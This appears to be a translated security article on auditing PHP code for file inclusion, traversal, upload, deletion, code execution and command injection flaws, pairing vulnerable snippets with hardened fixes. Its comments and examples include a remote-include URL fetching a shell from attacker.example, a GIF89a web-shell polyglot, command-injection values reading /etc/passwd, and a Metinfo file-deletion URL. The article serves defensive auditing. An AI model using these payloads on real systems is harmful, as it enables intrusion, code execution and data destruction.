Shulou (Shulou.com), Technology News & Howtos > Network Security. Report 05/31, updated 2025-01-18.
This article lists the PHP functions and code patterns that most often produce vulnerabilities during a code audit, grouped by vulnerability class, together with the usual bypasses and defences for each.
1. File inclusion
A. Local file inclusion
include(): includes the given file; if the file cannot be loaded it emits a warning and execution continues
include_once(): as above, but a file that has already been included is not included again
require(): includes the given file; if the file cannot be loaded it emits a fatal error and execution stops
require_once(): as above, but a file that has already been included is not included again
All four take a path. When any part of that path is built from request data, an attacker can include arbitrary local files.
B. Remote file inclusion:
Only possible when php.ini enables it (it is Off by default) and allow_url_fopen is also On:
allow_url_include = On
C. File inclusion truncation (used to get rid of a suffix the code appends, e.g. include($page . '.php'))
a. Null byte (%00) truncation: the path is cut at the null byte (PHP versions before 5.3.4)
b. Question mark pseudo-truncation: for a remote include, everything after ? is treated as the query string of the request, so the appended suffix is ignored by the remote server
c. Dot/slash truncation: padding the path with repeated ./ or / pushes it past the maximum path length, and the appended suffix is dropped (old PHP versions only)
2. File reading (download) vulnerabilities:
Search for key functions:
file_get_contents(), highlight_file(), show_source(), fopen() (opens the file) followed by fread() / fgets() / fgetss() (read from it), file(), readfile(), parse_ini_file()
Then trace the path argument back to its source: if any part of it comes from the request, try ../ traversal to read files outside the intended directory.
3. File upload vulnerability:
Search for key functions:
move_uploaded_file(); then check whether the code around the call restricts the upload format at all, and whether that restriction can be bypassed.
(1) No filtering, or client-side filtering only:
The server does not check the file, so a .php file can be uploaded directly (a JavaScript check in the browser is bypassed by editing the request).
(2) Blacklist extension filtering:
The list is rarely complete: by default IIS also parses .asp, .cdx, .asa and .cer, and Apache, depending on its handler configuration, executes extensions such as .php3, .phtml and .phar, so any executable extension missing from the blacklist bypasses it.
(3) Trailing space (and case) bypass:
.php is blocked, but the name "1.php " (note the trailing space) is not equal to "1.php", so it passes a plain string comparison; Windows then strips the trailing space when the file is written, and the stored file is 1.php. An uppercase extension such as 1.PHP bypasses a case-sensitive comparison in the same way when the web server treats it as PHP.
(4) Bypassing Content-Type and image header checks:
getimagesize(): only inspects the image header, so any file that begins with GIF89a (followed by PHP code) is accepted as a GIF.
Checking $_FILES["file"]["type"] only restricts the Content-Type header of the upload, which is set by the client and is therefore fully attacker-controlled.
Defences:
Whitelist the allowed extensions and compare strictly: in_array($ext, $allowed, true) or ===.
Rename the uploaded file on save. A common rule is a timestamp concatenated with a random number, md5(time() . rand(1, 1000)); note that such a name is guessable, so a value from random_bytes() is preferable when the name must not be predictable.
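As an added example (not code from the original article), the weak upload checks described above next to a hardened version that applies the defences. The field name $_FILES['file'], the upload directory and the function names are assumptions.

```php
<?php
// Added example, not code from the original article: the upload checks the
// article warns about (blacklist, Content-Type, GIF89a header) next to a
// hardened version. $_FILES['file'] and the upload directory are assumptions.

// --- Weak: each check here has the bypass described above ---
function weak_upload_check(array $file): bool
{
    // Blacklist: .phtml, .php3, .phar etc. are not listed and pass
    $blacklist = ['php', 'asp'];
    $ext = substr(strrchr($file['name'], '.'), 1);
    // "1.php " gives $ext "php ", which is not "php"; Windows stores it as 1.php
    if (in_array($ext, $blacklist)) {
        return false;
    }
    // $file['type'] is the client's Content-Type header: attacker sets image/gif
    if ($file['type'] !== 'image/gif') {
        return false;
    }
    // Passes for any content starting with "GIF89a", e.g. "GIF89a<?php system($_GET['c']); ?>"
    return @getimagesize($file['tmp_name']) !== false;
}

// --- Hardened: whitelist, strict comparison, type from bytes, random name ---
function hardened_upload_save(array $file, string $uploadDir): ?string
{
    $allowed = ['jpg', 'jpeg', 'png', 'gif'];

    // Extension from the submitted name, trimmed and lowercased so "1.php " and
    // "1.PHP" cannot slip past; strict in_array (third argument true) rules out
    // loose comparisons such as 0 == "jpg"
    $nameExt = strtolower(pathinfo(trim($file['name']), PATHINFO_EXTENSION));
    if (!in_array($nameExt, $allowed, true)) {
        return null;
    }

    // Ignore $file['type']; derive the type from the file bytes instead
    $info = @getimagesize($file['tmp_name']);
    if ($info === false) {
        return null;
    }
    $ext = image_type_to_extension($info[2], false);   // "jpeg", "png", "gif"
    if (!in_array($ext, $allowed, true)) {
        return null;
    }

    // A GIF89a + PHP polyglot still passes getimagesize(), so the stored name is
    // random and carries the detected extension, never the user's name, and the
    // upload directory must be served with script execution disabled.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;  // unlike md5(time() . rand()), not guessable
    $dest = rtrim($uploadDir, '/') . '/' . $newName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $newName;
}

// Usage inside the request handler:
// $saved = hardened_upload_save($_FILES['file'], __DIR__ . '/uploads');
```

The hardened function deliberately keeps getimagesize(): it is still a useful filter, but the code no longer relies on it, because the name, the extension and the storage location are all chosen by the server rather than by the uploader.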
4. File deletion vulnerabilities (uncommon)
Search for key functions:
unlink(): trace the path variable back to its source to see whether it is user-controlled.
Old versions of session_destroy() could be abused to delete files; this has essentially been fixed.
Metinfo's arbitrary file deletion: with $action = delete the code is meant to remove .sql backup files, but when the submitted name is not a .sql file it deletes the submitted file name directly, so a traversal path removes any file:
Target.com/recovery.php?&action=delete&filename=../../index.php
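Sections 1, 2 and 4 are the same bug class: a request parameter reaches include(), a read function or unlink() as a path. As an added example (not code from the original article or from Metinfo), the three vulnerable shapes together with one hardening helper shared by all three. Directory names, parameter names and function names are assumptions.

```php
<?php
// Added example, not code from the original article: one user-controlled path
// flowing into include(), readfile() and unlink(), and one canonicalisation
// helper used by the fixed versions. Directory and parameter names are assumptions.

// --- Vulnerable patterns the audit looks for ---
function vulnerable_page(): void
{
    // ?page=../../../../etc/passwd%00   (null byte truncation, PHP < 5.3.4)
    // ?page=http://attacker.example/shell.txt?   (remote include, allow_url_include=On)
    include 'pages/' . $_GET['page'] . '.php';
}
function vulnerable_download(): void
{
    readfile('uploads/' . $_GET['f']);          // ?f=../config.php
}
function vulnerable_delete(): void
{
    unlink('backup/' . $_POST['filename']);    // filename=../../index.php
}

// --- Hardening helper: canonicalise, then require the result to stay inside $baseDir ---
function safe_path(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Reject NUL and other control characters before touching the filesystem
    if (preg_match('/[\x00-\x1f]/', $userPath)) {
        return null;
    }
    // realpath() resolves "..", symlinks and "./" padding, and returns false for a
    // file that does not exist, so a traversal either fails here or ends up outside $base
    $full = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// --- Fixed versions ---
function safe_page(): void
{
    // For include() a whitelist is simplest: no request string reaches include at all
    $pages = ['home' => 'pages/home.php', 'about' => 'pages/about.php'];
    $key = $_GET['page'] ?? 'home';
    include $pages[$key] ?? $pages['home'];
}
function safe_download(string $name): void
{
    $path = safe_path(__DIR__ . '/uploads', $name);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    readfile($path);
}
function safe_delete(string $name): bool
{
    $path = safe_path(__DIR__ . '/backup', $name);
    // Enforce the intended file type as well, which is the check the Metinfo code lacked
    if ($path === null || pathinfo($path, PATHINFO_EXTENSION) !== 'sql') {
        return false;
    }
    return unlink($path);
}
```

The prefix comparison after realpath() is the part that matters: checking the raw input for "../" misses URL-encoded and symlink variants, whereas comparing the resolved absolute path against the resolved base directory is independent of how the traversal was written.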
5. Code execution
Regular functions:
eval(), assert(), preg_replace() with the /e modifier, call_user_func(), call_user_func_array(), array_map()
array_filter(): passes each value of the array to the callback in turn; values for which the callback returns true are kept. Like array_map() and usort(), it is a sink whenever the callback name comes from user input.
create_function(): builds a function from a code string (deprecated in PHP 7.2, removed in 8.0)
usort(): sorts an array with a user-supplied comparison callback
${}: inside a double-quoted string, ${expr} is evaluated, so "${phpinfo()}" calls phpinfo(); this is how code reaches execution through eval() or the /e modifier even when the quotes in the input are escaped
Execution via preg_replace():
mixed preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int $limit = -1 [, int &$count]])
When $pattern carries the e modifier, $replacement is evaluated as PHP code after the backreferences have been substituted (deprecated in PHP 5.5, removed in 7.0; preg_replace_callback() is the replacement).
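As an added example (not code from the original article), the callback sinks and the /e modifier fed by request parameters, next to replacements that never pass a user string to an evaluator. Parameter names and function names are assumptions.

```php
<?php
// Added example, not code from the original article: the callback and /e sinks
// listed above with user-controlled input, then fixed versions.
// Parameter names are assumptions.

// --- Vulnerable: the callback name is user-controlled ---
// ?cb=system&arg=id   =>  array_map('system', ['id']) runs the command
function vulnerable_map(string $cb, string $arg): array
{
    return array_map($cb, [$arg]);
}
// array_filter($data, $_GET['cb']), usort($data, $_GET['cb']) and
// call_user_func($_GET['cb'], $_GET['arg']) are the same sink.
// is_callable($cb) is not a fix: 'system' is callable.

// --- Vulnerable (PHP < 7.0): /e evaluates $replacement as PHP ---
// The backreference is substituted into a double-quoted string, so a subject of
// {${phpinfo()}} turns the evaluated code into strtoupper("{${phpinfo()}}"), and
// the ${} interpolation calls phpinfo() although quotes in the subject are escaped.
function vulnerable_replace(string $subject)
{
    return preg_replace('/(.*)/e', 'strtoupper("\\1")', $subject);
}

// --- Fixed: map request values onto an allowlist of callables ---
function safe_map(string $cb, string $arg): array
{
    $allowed = ['upper' => 'strtoupper', 'lower' => 'strtolower', 'trim' => 'trim'];
    if (!isset($allowed[$cb])) {
        throw new InvalidArgumentException('unknown callback: ' . $cb);
    }
    return array_map($allowed[$cb], [$arg]);
}

// --- Fixed: a closure instead of a code string ---
function safe_replace(string $subject): string
{
    return preg_replace_callback('/(.*)/', fn(array $m) => strtoupper($m[1]), $subject);
}

// Usage:
// var_dump(safe_map($_GET['cb'] ?? 'upper', $_GET['arg'] ?? ''));
// echo safe_replace($_GET['s'] ?? '');
```

The allowlist maps short request keys to fixed function names, so the request can select a behaviour but never name a function; that is the distinction to look for when auditing any call that accepts a callback.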
6. Command execution
Search for key functions:
system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open(); also the backtick operator, which behaves like shell_exec()
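As an added example (not code from the original article), a shell sink fed by a request parameter, followed by two ways to fix it. The ping wrapper, the parameter name and the function names are assumptions.

```php
<?php
// Added example, not code from the original article: a command execution sink
// and two fixes. The ping wrapper and parameter name are assumptions.

// Vulnerable:  ?host=127.0.0.1;id   ?host=$(id)   ?host=127.0.0.1|cat /etc/passwd
function vulnerable_ping(string $host): ?string
{
    return shell_exec('ping -c 1 ' . $host);
}

// Fix 1: validate against the expected shape, then quote what is passed to the shell
function ping_validated(string $host): ?string
{
    // hostnames / IPv4 only; a leading "-" is rejected so the value cannot become
    // an option to ping, and space ; | $ ` are rejected outright
    if (!preg_match('/^(?!-)[A-Za-z0-9.-]{1,253}$/', $host)) {
        return null;
    }
    return shell_exec('ping -c 1 ' . escapeshellarg($host));
}

// Fix 2 (PHP >= 7.4): the array form of proc_open() runs the binary without a
// shell, so metacharacters are passed literally in argv and never interpreted.
// Argument injection (a host starting with "-") is still possible, hence the check.
function ping_no_shell(string $host): ?string
{
    if ($host === '' || $host[0] === '-') {
        return null;
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['ping', '-c', '1', $host], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Usage:
// echo ping_no_shell($_GET['host'] ?? '') ?? 'invalid host';
```

escapeshellarg() alone stops shell injection but not argument injection, which is why both fixes keep an input check in front of the call; when the command takes the value as a positional argument, the no-shell form is the safer default.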